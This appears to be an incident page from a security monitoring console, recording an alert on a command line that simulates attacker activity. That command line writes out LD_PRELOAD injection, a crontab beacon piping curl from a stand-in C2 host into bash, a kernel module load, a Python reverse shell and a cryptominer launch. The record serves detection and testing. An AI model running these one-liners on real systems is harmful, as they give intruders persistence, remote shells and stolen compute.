Back to list

Medium CINC-20251220-4CE93E1A new

Aggregate ID: aggind:b4aeee57c4b841bc95cb853f0aca95e1:4360873623

Incident ID CINC-20251220-4CE93E1A

Severity Medium (70)

Status new

Alert Count 1

Host Count 1

First Seen 2025-12-13 17:57:08

Last Seen 2025-12-13 17:57:08

Duration 0d 0h 0m

Created 2025-12-20 13:23

Updated 2026-01-13 15:14

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...

Observed Tactics:

Techniques:

Severity	Status	Hostname	Description	Tactic	Command Line	Time
High	new	localhost.localdomain	The activity appears to be related to an adversary establishing persistence. The host may already be compromised and the activity should be investigated further to find the source.	Persistence	bash -c echo '[1] EICAR 안티바이러스 테스트 파일...' echo 'X5O\!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE\!$H+H' > /tmp/eicar_test.com echo '[2] LD_PRELOAD 인젝션 시도...' echo 'void __attribute__((constructor)) init() { system("id"); }' > /tmp/inject.c gcc -shared -fPIC -o /tmp/inject.so /tmp/inject.c 2>/dev/null LD_PRELOAD=/tmp/inject.so /bin/ls 2>/dev/null echo '[3] Crontab C2 비콘...' (crontab -l 2>/dev/null; echo '/1 * * * * curl http://c2.evil.com/beacon \| bash') \| crontab - sleep 1 crontab -r 2>/dev/null echo '[4] Kernel module 로드 시도...' insmod /tmp/fake_rootkit.ko 2>/dev/null \|\| true echo '[5] Reverse shell via Python...' python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);subprocess.call(["/bin/sh","-i"])' 2>/dev/null & sleep 1 echo '[6] Cryptominer 시뮬레이션...' /tmp/xmrig --donate-level=1 --url=stratum+tcp://pool.minexmr.com:4444 2>/dev/null \|\| true echo 'Done on server 62'	12-13 17:57